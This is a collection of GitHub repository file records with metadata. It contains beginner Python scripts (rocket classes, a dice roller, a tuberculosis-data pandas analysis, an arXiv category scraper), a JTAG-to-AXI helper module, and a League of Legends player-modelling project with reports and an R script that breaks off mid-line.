] | 1 |
enzosuname/pythonProject
|
https://github.com/enzosuname/pythonProject
|
2845810879e4758dc49bb6bbb4dbf8d0d4076853
|
85033a389bf488e4dc88621c315f4d0a80d2cafe
|
ac8f342612dc1f98ce720c11df906c435f6c0059
|
refs/heads/master
| 2023-08-18T18:58:23.862023 | 2021-09-17T13:29:49 | 2021-09-17T13:29:49 | 405,971,088 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5457875728607178,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 20.84000015258789,
"blob_id": "bc9e757351726a2568894bf8bce37ce95baa7727",
"content_id": "9f49d2ed0cadcec542bd04ad29d61e51a0371bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 25,
"path": "/main.py",
"repo_name": "enzosuname/pythonProject",
"src_encoding": "UTF-8",
"text": "class Rocket():\n def __init__(self, x_loc, y_loc, height=200):\n self.height = height\n self.velocity = 10\n self.x_loc = x_loc\n self.y_loc = y_loc\n\n def move_up(self):\n self.y_loc += self.velocity\n\nRocket1 = Rocket(2,3)\nRocket2 = Rocket(200, 300)\n\nfor i in range(10):\n Rocket2.move_up()\n print(Rocket2.y_loc)\n print()\n\nenemy_rockets = [Rocket(80, 90) for i in range(10)]\nfor i in range(10):\n rocket=Rocket(50, 60)\n enemy_rockets.append(rocket)\n\nfor rocket in enemy_rockets:\n print(rocket)\n"
},
{
"alpha_fraction": 0.5373226404190063,
"alphanum_fraction": 0.5749537348747253,
"avg_line_length": 23.953845977783203,
"blob_id": "802df2c955c5eaa73a1ddfd665faa4697ac9efd9",
"content_id": "e57e6871cae2d642577113e02b8291b31d739d64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 65,
"path": "/oob.py",
"repo_name": "enzosuname/pythonProject",
"src_encoding": "UTF-8",
"text": "import random as r\n\nclass Rocket():\n def __init__(self, x_loc=0, y_loc=0, height=200):\n self.height = height\n self.x_loc = x_loc\n self.y_loc = y_loc\n\n\n def move_rocket(self,y_vel,x_vel):\n self.y_loc += y_vel\n self.x_loc += x_vel\n\nRocket1 = Rocket(200, 300)\n\nfor i in range(5):\n Rocket1.move_rocket(int(input(f\"At what rate is the rocket moving vertically? : \")), \\\n int(input(f\"At what rate is the rocket moving horizontally? : \")))\n print(Rocket1.y_loc)\n print(Rocket1.x_loc)\n print()\n\ndef rocket_fleet():\n set = 0\n whichone = 0\n list =[]\n while set < 4:\n rdmrocket = Rocket(r.randrange(50, 450),(r.randrange(50, 450)))\n list.append(rdmrocket)\n set +=1\n for gabagool in list:\n print(f\"Rocket {whichone+1} is at x={gabagool.x_loc}, y={gabagool.y_loc}.\")\n whichone += 1\n gabagool.x_loc += r.randrange(10, 150)\n gabagool.y_loc += r.randrange(10, 150)\n whichone=0\n for gabagool in list:\n print(f\"Rocket {whichone+1} is NOW at x={gabagool.x_loc}, y={gabagool.y_loc}.\")\n whichone += 1\n\ndef get_distance():\n p\nrocket_fleet()\n\n\n\n\n\nclass Rocket():\n def __init__(self, x_loc=0, y_loc=0, color=\"red\", mass=200 ):\n self.color = color\n self.x_loc = x_loc\n self.y_loc = y_loc\n self.mass = mass\n\n\n def move_rocket(self,y_vel,x_vel):\n self.y_loc += y_vel\n self.x_loc += x_vel\n\nrocketnew1 = Rocket()\nrocketnew2 = Rocket(100, 2, \"blue\", 800)\nnews=[rocketnew1,rocketnew2]\nfor rocket in news:\n print(rocket.color, rocket.mass)"
}
] | 2 |
draconian56/PythonDnDRoller
|
https://github.com/draconian56/PythonDnDRoller
|
8eb0817e97a182331bd9e9d32d67dfe6ec588156
|
bb0a0d017a3459f967c3f83a263aa038f01e417a
|
85b694c8c9a9e224a1929cb869058369ad2c92a5
|
refs/heads/master
| 2021-01-20T09:38:27.618702 | 2017-05-06T11:21:30 | 2017-05-06T11:21:30 | 90,276,477 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44897958636283875,
"alphanum_fraction": 0.4516415297985077,
"avg_line_length": 26.897436141967773,
"blob_id": "1b39be0f7d6cc41a489ee9b9a386c6bfc42d23c3",
"content_id": "cab5f650d9bedd4b1aefdc33390c33c02d8cfbe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 39,
"path": "/DnDDiceRoller.py",
"repo_name": "draconian56/PythonDnDRoller",
"src_encoding": "UTF-8",
"text": "######################\r\n# This is a basic #\r\n# dice roller for my #\r\n# games of DnD #\r\n######################\r\n\r\nfrom random import *\r\n\r\nprint \"Welcome to the dice roller\"\r\n\r\nwhile True:\r\n choice = raw_input(\"Do you want to make a roll? \")\r\n if choice == \"\":\r\n diceRolled = 0\r\n total = 0\r\n while True:\r\n try:\r\n diceAmount = int(raw_input(\"Please enter how many times you would like to roll: \")) \r\n except ValueError:\r\n print \"Not an int, try again: \"\r\n continue\r\n else:\r\n break\r\n while True:\r\n try:\r\n diceSides = int(raw_input(\"Please input how many sides the dice has: \"))\r\n except ValueError:\r\n print \"Not an int, try again: \"\r\n continue\r\n else:\r\n break\r\n for i in range(diceAmount):\r\n diceRolled = randint(1, diceSides)\r\n total = total + diceRolled\r\n print diceRolled \r\n print total\r\n elif choice == \"no\":\r\n break\r\nexit()\r\n"
}
] | 1 |
gmazurek/Code-using-Pandas-for-database-design
|
https://github.com/gmazurek/Code-using-Pandas-for-database-design
|
7f9e7de7da6b2875739cb334af2212bc4759befb
|
ce2693e9bde4276df52cf3ca0f68b112ecde0ced
|
066f902ff8a66d804bba0afc114ae1f2b6c7f30d
|
refs/heads/master
| 2020-05-02T14:52:11.972262 | 2019-03-27T15:36:45 | 2019-03-27T15:36:45 | 178,024,294 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6311320662498474,
"alphanum_fraction": 0.6726415157318115,
"avg_line_length": 41.838382720947266,
"blob_id": "d00ed371c49197b9002f07be601c68912c687c4d",
"content_id": "864666186f47fb2a6bca40b1f73f19a081cd5826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4240,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 99,
"path": "/assignment_3.py",
"repo_name": "gmazurek/Code-using-Pandas-for-database-design",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Tue Feb 19 11:56:25 2019\n\n@author: gabriellamazurek\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n\ndef pandas1():\n #read in the csv and account for the missing data with asterisks. Note: in assignment #2 I did not have asterisks in place of missing data, and now I do.\n df=pd.read_csv(' data_out_copy.csv',sep=',',encoding='utf-8',\n na_values='*')\n \n #get number of rows and columns\n num_rows = df.shape[0]\n num_cols = df.shape[1]\n\n print(\"Number of rows: \"+str(num_rows))\n print(\"Number of columns: \"+str(num_cols)) \n\n \n\n \n print(\"\\nSorting the success rate of treatment on new TB patients in 2016 in descending order:\")\n \n #sort the new TB cases of 2016 in descending order\n selection1 = df.loc[(df[\"Year\"]==2016)].sort_values(\"Treatment success rate: new TB cases\", ascending = False) \n print(selection1[[\"Country\", \"Treatment success rate: new TB cases\"]])\n \n\n #get the average success rate for new TB cases in 2016\n print(\"The mean success rate in 2016:\")\n print(selection1[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for new TB cases in 2016\n print(\"The median success rate in 2016:\")\n print(selection1[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n print(\"\\nSorting the success rate of treatment on new TB patients in 1995 in descending order:\")\n \n selection2 = df.loc[(df[\"Year\"]==1995)].sort_values(\"Treatment success rate: new TB cases\", ascending = False) \n print(selection2[[\"Country\", \"Treatment success rate: new TB cases\"]])\n \n \n #get the average success rate for new TB cases in 1995\n print(\"The mean success rate in 1995:\")\n print(selection2[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for new TB cases in 1995\n print(\"The median success rate in 1995:\")\n print(selection2[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n #bottom 10 0f 2016 in new TB\n print(\"\\nThe ten countries with the lowest success rate in treatment of new TB cases in 2016:\")\n \n selection3 = df.loc[(df[\"Year\"]==2016)].sort_values(\"Treatment success rate: new TB cases\", ascending = False)\n print(selection3[[\"Country\", \"Treatment success rate: new TB cases\"]].dropna().tail(10))\n #get the average success rate for bottom 10 new TB cases in 2016\n print(\"The mean success rate:\")\n print(selection3[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).mean())\n \n #get the median success rate for bottom 10 new TB cases in 2016\n print(\"The median success rate:\")\n print(selection3[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).median())\n \n\n #bottom 10 0f 1995 in new TB\n print(\"\\nThe ten countries with the lowest success rate in treatment of new TB cases in 2016:\")\n \n selection4 = df.loc[(df[\"Year\"]==1995)].sort_values(\"Treatment success rate: new TB cases\", ascending = False)\n print(selection4[[\"Country\", \"Treatment success rate: new TB cases\"]].dropna().tail(10))\n #get the average success rate for bottom 10 new TB cases in 1995\n print(\"The mean success rate:\")\n print(selection4[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).mean())\n \n #get the median success rate for bottom 10 new TB cases in 1995\n print(\"The median success rate:\")\n print(selection4[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).median())\n \n #argentina is the only country in 1995 and 2016 bottom 10- check out its' data, see if it's progressed\n print(\"\\nArgentina's success rate 1995-2016:\")\n \n selection5 = df.loc[(df[\"Country\"]==\"Argentina\")].sort_values(\"Year\", ascending = False)\n print(selection5[[\"Year\", \"Treatment success rate: new TB cases\"]].dropna())\n #get the average success rate for argentina\n print(\"The mean success rate:\")\n print(selection5[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for argentina\n print(\"The median success rate:\")\n print(selection5[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n \npandas1()"
}
] | 1 |
yoyo0055/YOYO
|
https://github.com/yoyo0055/YOYO
|
696b690c340f66ad163e8180d25b9da362fe4842
|
deff6ac28593161c545588ef4648a985728e4709
|
225261dffa68fcde2f5de55e9a6e4d4f53a57ecd
|
refs/heads/main
| 2023-02-14T17:48:19.889068 | 2021-01-12T16:27:46 | 2021-01-12T16:27:46 | 329,043,863 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5805449485778809,
"alphanum_fraction": 0.6080306172370911,
"avg_line_length": 27.871429443359375,
"blob_id": "97fffb6f9885d553ac613f9942ba634ffcb146c0",
"content_id": "7a0e09122139da11152c079a3071c0ef81b29a4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5002,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 140,
"path": "/添加编号.py",
"repo_name": "yoyo0055/YOYO",
"src_encoding": "UTF-8",
"text": "#-*— codeing = utf-8 -*—\r\n#@Time : 2021/01/11 13:40\r\n#@Author : gyr\r\n#@File : 添加编号.py\r\n#@software : PyCharm\r\n\r\nimport seaborn as sns #用于画图\r\nfrom bs4 import BeautifulSoup #用于爬取arxiv的数据\r\nimport re #用于正则表达式,匹配字符串的模式\r\nimport requests #用于网络连接,发送网络请求,使用域名获取对应信息\r\nimport json #读取数据,我们的数据为json格式的\r\nimport pandas as pd #数据处理,数据分析\r\nimport matplotlib.pyplot as plt #画图工具pu\r\n\r\n# 读入数据\r\ndata = [] # 初始化\r\n# 使用with语句优势:1.自动关闭文件句柄;2.自动显示(处理)文件读取数据异常\r\nwith open(\"arxiv-metadata-oai-snapshot.json\", 'r') as f:\r\n for index, line in enumerate (f):\r\n data.append(json.loads(line))\r\n # if index < 100000:\r\n # data.append(json.loads(line))\r\n # else :\r\n # break\r\n\r\n\r\ndata = pd.DataFrame(data) # 将list变为dataframe格式,方便使用pandas进行分析\r\nprint(data.shape)\r\n#data.shape # 显示数据大小\r\n\r\n# '''\r\n# count:一列数据的元素个数;\r\n# unique:一列数据中元素的种类;\r\n# top:一列数据中出现频率最高的元素;\r\n# freq:一列数据中出现频率最高的元素的个数;\r\n# '''\r\n\r\nprint(data[\"categories\"].describe())\r\n\r\nunique_categories = set([i for l in [x.split(' ') for x in data[\"categories\"]] for i in l])\r\nlen(unique_categories)\r\nunique_categories\r\n\r\ndata[\"year\"] = pd.to_datetime(data[\"update_date\"]).dt.year #将update_date从例如2019-02-20的str变为datetime格式,并提取处year\r\ndel data[\"update_date\"] #删除 update_date特征,其使命已完成\r\ndata = data[data[\"year\"] >= 2019] #找出 year 中2019年以后的数据,并将其他数据删除\r\n# data.groupby(['categories','year']) #以 categories 进行排序,如果同一个categories 相同则使用 year 特征进行排序\r\ndata.reset_index(drop=True, inplace=True) #重新编号\r\ndata #查看结果\r\n\r\n# 爬取所有的类别\r\nwebsite_url = requests.get('https://arxiv.org/category_taxonomy').text # 获取网页的文本数据\r\nsoup = BeautifulSoup(website_url, 'lxml') # 爬取数据,这里使用lxml的解析器,加速\r\nroot = soup.find('div', {'id': 'category_taxonomy_list'}) # 找出 BeautifulSoup 对应的标签入口\r\ntags = root.find_all([\"h2\", \"h3\", \"h4\", \"p\"], recursive = True) # 读取 tags\r\n\r\n# 初始化 str 和 list 变量\r\nlevel_1_name = \"\"\r\nlevel_2_name = \"\"\r\nlevel_2_code = \"\"\r\nlevel_1_names = []\r\nlevel_2_codes = []\r\nlevel_2_names = []\r\nlevel_3_codes = []\r\nlevel_3_names = []\r\nlevel_3_notes = []\r\n\r\n# 进行\r\nfor t in tags:\r\n if t.name == \"h2\":\r\n level_1_name = t.text\r\n level_2_code = t.text\r\n level_2_name = t.text\r\n elif t.name == \"h3\":\r\n raw = t.text\r\n level_2_code = re.sub(r\"(.*)\\((.*)\\)\", r\"\\2\", raw) # 正则表达式:模式字符串:(.*)\\((.*)\\);被替换字符串\"\\2\";被处理字符串:raw\r\n level_2_name = re.sub(r\"(.*)\\((.*)\\)\", r\"\\1\", raw)\r\n elif t.name == \"h4\":\r\n raw = t.text\r\n level_3_code = re.sub(r\"(.*) \\((.*)\\)\", r\"\\1\", raw)\r\n level_3_name = re.sub(r\"(.*) \\((.*)\\)\", r\"\\2\", raw)\r\n elif t.name == \"p\":\r\n notes = t.text\r\n level_1_names.append(level_1_name)\r\n level_2_names.append(level_2_name)\r\n level_2_codes.append(level_2_code)\r\n level_3_names.append(level_3_name)\r\n level_3_codes.append(level_3_code)\r\n level_3_notes.append(notes)\r\n\r\n# 根据以上信息生成dataframe格式的数据\r\ndf_taxonomy = pd.DataFrame({\r\n 'group_name': level_1_names,\r\n 'archive_name': level_2_names,\r\n 'archive_id': level_2_codes,\r\n 'category_name': level_3_names,\r\n 'categories': level_3_codes,\r\n 'category_description': level_3_notes\r\n\r\n})\r\n\r\n# 按照 \"group_name\" 进行分组,在组内使用 \"archive_name\" 进行排序\r\ndf_taxonomy.groupby([\"group_name\", \"archive_name\"])\r\ndf_taxonomy\r\n\r\nimport re\r\n#\r\n# phone = \"2004-959-559 # 这是一个电话号码\"\r\n\r\n# 删除注释\r\n# num = re.sub(r'#.*$', \"\", phone)\r\n# print(\"电话号码 : \", num)\r\n#\r\n# # 移除非数字的内容\r\n# num = re.sub(r'\\D', \"\", phone)\r\n# print(\"电话号码 : \", num)\r\n\r\nre.sub(r\"(.*)\\((.*)\\)\",r\"\\2\",raw)\r\n\r\n#raw = Astrophysics(astro-ph)\r\n#output = astro-ph\r\n\r\n\r\n\r\n_df = data.merge(df_taxonomy, on=\"categories\", how=\"left\").drop_duplicates([\"id\",\"group_name\"]).groupby(\"group_name\").agg({\"id\":\"count\"}).sort_values(by=\"id\",ascending=False).reset_index()\r\n\r\nprint(_df)\r\n\r\n\r\n\r\nfig = plt.figure(figsize=(15,12))\r\nexplode = (0, 0, 0, 0.2, 0.3, 0.3, 0.2, 0.1)\r\nplt.pie(_df[\"id\"], labels=_df[\"group_name\"], autopct='%1.2f%%', startangle=160, explode=explode)\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n\r\ngroup_name=\"Computer Science\"\r\ncats = data.merge(df_taxonomy, on=\"categories\").query(\"group_name == @group_name\")\r\ncats.groupby([\"year\",\"category_name\"]).count().reset_index().pivot(index=\"category_name\", columns=\"year\",values=\"id\")\r\n\r\n"
}
] | 1 |
npp-ntt/jtaxi
|
https://github.com/npp-ntt/jtaxi
|
1183f8ff8d90c15f7c85071b634b9958fffdc6d0
|
73f3b588b0523d2e1fd593b928a9916cce71fbc9
|
b9a363160603418fd1204458e9b5287d7182ae9c
|
refs/heads/master
| 2020-06-23T14:48:19.949987 | 2019-08-02T06:30:53 | 2019-08-02T06:30:53 | 198,653,989 | 5 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4433459937572479,
"alphanum_fraction": 0.46920153498649597,
"avg_line_length": 27.377777099609375,
"blob_id": "5f92191c3a7d852255da442f91b004e703396665",
"content_id": "8924a63c818dee7cc37329d182e228788b60db4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2630,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 90,
"path": "/python_code/JTAG2AXI.py",
"repo_name": "npp-ntt/jtaxi",
"src_encoding": "UTF-8",
"text": "from jft import *\r\nfrom jftsettings import *\r\n\r\ndef TransToAXIS(group_name, width, flag_last, data):\r\n if((width>64)|(width<8)): \r\n print(\"TransToAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\n if ((flag_last<0)|(flag_last >1)) : \r\n print(\"TransToAXIS: --------------ERROR! Incorrect flag_last--------------\")\r\n sys.exit()\r\n DriveGroup(group_name, ((1 << width) | (flag_last << width + 1) | data))\r\n\r\r\n\r\r\ndef RecivFromAXIS(group_name, width):\r\n if((width>64)|(width<8)): \r\n print(\"RecivFromAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\r\n DriveGroup(group_name, ((1 << width) | ((1 << width + 2))))\r\n data = GetGroup(group_name) \r\n data=bin(data)\r\n data=data[5:]\r\n return bit2int(data)\r\r\n\r\r\ndef ResetAXIS(group_name,width):\r\n if((width>64)|(width<8)): \r\n print(\"ResetAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\r\n DriveGroup(group_name, 1<<width+1)\r\r\n\r\ndef TransToAXIL(group_name,data,addr,SWidth):\r\n if(addr%4 != 0):\r\n print(\"TransToAXIMM: --------------ERROR! Incorrect addr (addr%4 != 0)--------------\")\r\n sys.exit()\r\n if((SWidth>64)|((SWidth<8)&(SWidth!=0))): \r\n print(\"TransToAXIMM: --------------ERROR! Incorrect SWidth--------------\") \r\n if(SWidth==0):\r\n DriveGroup(group_name, ((data<<32)|addr)) \r\n else:\r\n DriveGroup(group_name, (((data<<32)|addr)<<SWidth)) \r\n \r\ndef RecivFromAXIL(group_name, addr,SWidth):\r\n if(addr%4 != 0):\r\n print(\"RecivFromAXIMM: --------------ERROR! Incorrect addr (addr%4 != 0)--------------\")\r\n sys.exit()\r\n if((SWidth>64)|(SWidth<8 & SWidth!=0)): \r\n print(\"RecivFromAXIMM: --------------ERROR! Incorrect SWidth--------------\") \r\n if(SWidth==0):\r\n DriveGroup(group_name, ((1<<64)|addr))\r\n data = GetGroup(group_name);\r\n else:\r\n DriveGroup(group_name, ((1<<64)|addr)<<SWidth)\r\n data = GetGroup(group_name);\r\n data=bin(data);\r\n return int(data[3:32+3],2) \r\n\r\r\ndef bit2int(input):\r\r\n if (input[0] == '0'):\r\r\n # output=input[1:]\r\r\n output = input[1:]\r\r\n output = int(output, 2);\r\r\n else:\r\r\n for i in range(1, len(input)):\r\r\n if (input[i] == '0'):\r\r\n input = input[:i] + '1' + input[i + 1:]\r\r\n else:\r\r\n input = input[:i] + '0' + input[i + 1:]\r\r\n output = input[1:]\r\r\n output = -(int(output, 2) + 1);\r\r\n return output "
},
{
"alpha_fraction": 0.7599999904632568,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 24,
"blob_id": "e3d6d765efbd3cd207cbae291110a5098760360d",
"content_id": "c9e7e3123888c516841e13bd37052d1c69818315",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 50,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 2,
"path": "/README.md",
"repo_name": "npp-ntt/jtaxi",
"src_encoding": "UTF-8",
"text": "# jtaxi\nJtag to AXI lite/AXI stream IP for Xilinx\n"
}
] | 2 |
GabeHinton/League-Project
|
https://github.com/GabeHinton/League-Project
|
c94ba9fe542ab38b0013cf36829db4f26e1c6b00
|
da15e0219565f1a7a3e2985d267c5a176a400dae
|
3ed565fdeec6cb79ae6b8fdbe5bc7b8eccf98cf8
|
refs/heads/master
| 2021-01-10T17:20:31.816145 | 2016-02-29T22:26:06 | 2016-02-29T22:26:06 | 51,344,341 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7868852615356445,
"alphanum_fraction": 0.7868852615356445,
"avg_line_length": 19.33333396911621,
"blob_id": "ae9ed2bb658cec81f243172d3f186f640fd008b5",
"content_id": "ec1936c0dea61547b5b30a5897c2875218859d1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 3,
"path": "/Images/Readme.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#Images\n\nA folder for uploading images used in the reports.B\n"
},
{
"alpha_fraction": 0.7480236887931824,
"alphanum_fraction": 0.7845849990844727,
"avg_line_length": 71.10713958740234,
"blob_id": "132577811766bcaed7744fad8b693b7543b8ada8",
"content_id": "05f7a5c82dad2ab49e325e9cb66a34a347a90aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2024,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 28,
"path": "/Player-A-Model/Executive Summary - Player A.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#Executive Summary - Player A Model\n\nData was compiled for ranked games during which Player A played Support. Using the same fourteen variables as player T,\na model was built to attempt to predict whether Player A would win or lose his match. The final model had\nthree significant variables:\n\nGold1020: The average gold per minute Player A earned from minutes 10 to 20 \nDamageTaken1020: The average damage per minute Player A took from minutes 10 to 20 \nWardsPlaced: The number of wards of any type placed by Player A during the match. \n\nThe model correctly predicted 83% of games correctly, which is even higher than Player T's model. Curiously, two of Player A's \nthree significant variables were the only two variables that were significant in Player T's model. This discovery does help answer\none of the questions raised after the Player T analysis, perhaps the model in whole or part can be generalized to all roles.\nThe following questions still remain to follow up from this analysis: \n\n1) Can we generalize this model to Jungle? Will Gold1020 and DamageTaken1020 appear again? \n2) Can we generalize this model for all Support players? Will the same variables be significant? \n3) Can we support a claim that more gold and less damage taken are actually causing Player T to win? \nOne cannot conclude with confidence that taking less damage or earning more gold specifically lead to Players T and A having a higher \nchance of victory. It is possible that Players T and A are performing other actions that lead to his victory that also have a side effect \nof earning him gold or taking less damage.\n\nPerforming additional tests using a larger number of players to find evidence to address these questions will help validate\n and clarify the models.\n \nNumerically, the final model for Player A was as follows:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005*DamageTaken1020 + .0204*Gold1020 + .0661*WardsPlaced} / (1 + e^{-4.67 - .005*DamageTaken1020 + .0204*Gold1020 + .0661*WardsPlaced})\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7526621222496033,
"alphanum_fraction": 0.7850919365882874,
"avg_line_length": 107.7368392944336,
"blob_id": "cad1896f40ebb5530f650cfe75b509d55dc47598",
"content_id": "bb3865dae960688b1308296209fb088a8c09c00f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2066,
"license_type": "no_license",
"max_line_length": 434,
"num_lines": 19,
"path": "/Player-T-Model/Executive Summary - Player T.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# Executive Summary - Player T Model\n\nData was compiled for ranked games during which Player T played Top, Mid, or ADC. Using fourteen variables, a model was built to attempt to predict whether Player T would win or lose his match. The final model had two significant variables:\n\nGold1020: The average gold per minute Player T earned from minutes 10 to 20 \nDamageTaken1020: The average damage per minute Player T took from minutes 10 to 20 \n\nThe model correctly predicted 2/3 of games, notably more than would be expected from lucky guesses. Far from perfect accuracy is to be expected when trying to predict the outcome of a team game based on one player. However, it does seem these results indicate that a more accurate model that accounts for more variables should be possible. Thus, this analysis has led to the following questions that merit more testing to answer: \n\n1) Can we generalize the model for all players? Will the same and only the same two variables be significant in models built for different players playing Top, Mid, and/or ADC? \n2) Can we generalize the model for all roles? Will the same and only the same two variables be significant in models built for players playing as Jungle or Support? \n3) Can we add other variables not yet considered to improve the accuracy of predictions of Player T's model? \n4) Can we support a claim that more gold and less damage taken are actually causing Player T to win? One cannot conclude with confidence that taking less damage or earning more gold specifically lead to Player T having a higher chance of victory. It is possible that Player T is performing other actions that lead to his victory that also have a side effect of earning him gold or taking less damage. \n\nPerforming additional tests to find evidence to answering these questions will help validate and clarify the model.\n\nNumerically, the final model was as follows: \n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n"
},
{
"alpha_fraction": 0.7709183692932129,
"alphanum_fraction": 0.7734693884849548,
"avg_line_length": 114.29412078857422,
"blob_id": "2d17629a7fbfea7dfc3368330efd85da08a1a883",
"content_id": "73d7f1db94ca72128fa3cbe6381626cd190017d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1965,
"license_type": "no_license",
"max_line_length": 480,
"num_lines": 17,
"path": "/README.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# League-Project\nI used Riot Games, Inc.'s public API to model player behavior and outcomes in the game League of Legends. The first project was to teach myself some Python to access Riot's public API to compile a data set of 22 variables from the past 400 or so games of a given player's match history. I used these data sets to build models to assess which variables may be useful for predicting whether the player will win or lose a match. Thank you to Riot for making the public API available.\n\nTable of Contents:\n* *Python-API-Data-Compiler* - My first python program - teaching myself from scratch to access Riot's API to compile a data set to use for building models.\n* Player T Model - Contains files related to the model built around Player T\n * *Report for Player T.md* - A report about a classification model I built using data compiled with the above Python program. \n * *Player T Analysis.R* - Here you can look at the code I wrote in R to analyze the data set and build the model discussed in this report. \n * *Executive Summary - Player T.md* - An example of a summary for executives that have less need for details and less backgrounds knowledge in statistics.\n* Player A Model - Contains files related to the model built around Player A \n * *Report for Player A.md* - A follow up report focusing on a different style of player to compare classification models. \n * *Player A Analysis.R* - The code I wrote in R to analyze the data set and build the model for this report.\n * *Executive Summary - Player A.md* - An example of a summary for executives that have less need for details and less backgrounds knowledge in statistics.\n\n\n\nThis project isn’t endorsed by Riot Games and doesn’t reflect the views or opinions of Riot Games or anyone officially involved in producing or managing League of Legends. League of Legends and Riot Games are trademarks or registered trademarks of Riot Games, Inc. League of Legends © Riot Games, Inc.\n"
},
{
"alpha_fraction": 0.6749269366264343,
"alphanum_fraction": 0.7527004480361938,
"avg_line_length": 52.121620178222656,
"blob_id": "d50c05aa2db17097f9b7ef05c5b42ddafc84c0b5",
"content_id": "9ec2e10a35755b99c0c9e26397410a70656bb84e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 7869,
"license_type": "no_license",
"max_line_length": 281,
"num_lines": 148,
"path": "/Player-T-Model/Player T Analysis.R",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "bizdata <- read.table(\"D:\\\\My Documents\\\\LoL Analysis Data\\\\**********_history.csv\", header=T, sep=\",\")\n\n# First I'm removing the games where he played Jungler since many of the variables I want to use aren't relevant\nbizdataedit <- bizdata[bizdata$Role != 'NONE',]\nbizdataedit\n\n# He played jungler in 54 of the past 490 ranked games, leaving 436 observations.\n\n# Now I'm removing games that lasted less than 20 minutes, and I'm going to not use the variables\n# for 20-30 minutes because it is missing so often. 10-20 is not often missing so I won't\n# lose much data.\n\nbizdataedit <- bizdataedit[is.na(bizdataedit$Creeps1020) == FALSE,]\nbizdataedit$Creeps1020\nlength(bizdataedit$Creeps1020)\n\n# This removed 6 observations, leaving 430.\n\n# For the sake of logistic regression, I need to record the winner in terms of a \n# binary success indicator: 1 = he won, 0 = he lost\n# In addition, R assumes this is a factor so I convert it to a character\n# vector and finally numeric once the numbers are in place.\n\nbizdataedit$Winner. <- as.character(bizdataedit$Winner.)\nbizdataedit$Winner. <- replace(bizdataedit$Winner., bizdataedit$Winner. == 'True', '1')\nbizdataedit$Winner. <- replace(bizdataedit$Winner., bizdataedit$Winner. == 'False', '0')\nbizdataedit$Winner. <- as.numeric(bizdataedit$Winner.)\nLost <- 1 - bizdataedit$Winner.\nbizdataedit <- cbind(bizdataedit, Lost)\n\n# Now I'm splitting the data into a random 330 observation training set, and a random 100 observation test set\n\nset.seed(227)\ntrainnums <- sample(1:430, 330)\nbiztraindata <- bizdataedit[trainnums,]\nbiztestdata <- bizdataedit[-trainnums,]\n\n# Trying a stepwise model and a manual p-value selection to see what models I come up with.\n\nmodel1 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata, family=binomial)\nsummary(model1)\n\ntestmodel1 